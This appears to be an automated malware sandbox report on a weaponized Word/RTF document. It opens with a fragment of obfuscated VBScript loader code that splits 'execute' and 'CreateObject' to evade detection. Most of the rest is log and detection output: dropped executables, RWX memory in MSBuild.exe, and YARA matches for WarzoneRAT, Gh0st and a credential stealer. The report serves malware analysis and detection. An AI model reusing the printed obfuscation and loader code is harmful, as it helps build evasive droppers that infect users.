odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. 
dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "e
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe
Source: DZdtfhgYgeghD{.scT Static RTF information: Object: 0 Offset: 000007D1h DZdtfhgYgeghD{.scT
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_001900C8 8_2_001900C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197650 8_2_00197650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197219 8_2_00197219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197228 8_2_00197228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197640 8_2_00197640
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_001907EE 8_2_001907EE
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_0131A760 8_2_0131A760
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_01310048 8_2_01310048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_05890048 8_2_05890048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B00C8 20_2_002B00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7650 20_2_002B7650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7228 20_2_002B7228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7219 20_2_002B7219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7640 20_2_002B7640
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B07E0 20_2_002B07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E09850 20_2_04E09850
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E00042 20_2_04E00042
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E00048 20_2_04E00048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F00048 20_2_05F00048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F00038 20_2_05F00038
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F00C8 29_2_001F00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7650 29_2_001F7650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7219 29_2_001F7219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7228 29_2_001F7228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F07E0 29_2_001F07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_01329850 29_2_01329850
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_01320048 29_2_01320048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05500048 29_2_05500048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05500006 29_2_05500006
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: explorer[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: explorer.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eDdYRRbouy.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE Matched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f0